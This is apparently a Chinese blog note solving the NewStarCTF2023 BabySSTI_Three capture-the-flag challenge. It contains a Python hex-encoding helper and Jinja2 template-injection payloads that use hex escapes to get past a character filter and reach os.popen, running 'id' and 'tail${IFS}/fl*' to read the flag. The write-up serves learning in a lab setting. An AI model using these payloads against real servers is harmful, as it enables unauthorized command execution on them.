NewStarCTF2023新生赛_BabySSTI_Three - 刷题笔记

Post author: odiws @ Hexo
Post link: <a href="http://odiws.github.io/2025/01/26/NewStarCTF2023%E6%96%B0%E7%94%9F%E8%B5%9B-BabySSTI-Three/" title="NewStarCTF2023新生赛_BabySSTI_Three">http://odiws.github.io/2025/01/26/NewStarCTF2023新生赛-BabySSTI-Three/
Copyright Notice: All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"> (CC) BY-NC-SA unless stating additionally.

NewStarCTF2023 新生赛_BabySSTI_Three

之前用的是字符串逆序绕过，这里过滤了:，然后用十六进制绕过即可

def hex_payload(payload):
	res_payload = ''
	for i in payload:
		i = "\\x" + hex(ord(i))[2:]
		res_payload += i
	print('[+]"{}" Convert to hex: "{}"'.format(payload,res_payload))

if __name__ == '__main__':
	payload = "__class__"
	hex_payload(payload)

{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]}}

{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()}}

{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[117]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x70\x6f\x70\x65\x6e']('id').read()}}

{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[117]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x70\x6f\x70\x65\x6e']('tail${IFS}/fl*').read()}}

有了命令执行之后还需要有点绕过即可读取到 flag

参考链接：BUUCTF NewStarCTF 公开赛赛道 Week5 Writeup_buuctf week5-CSDN 博客

[NewStarCTF2023公开赛道]EasyLogin

公开赛赛道]UnserializeOne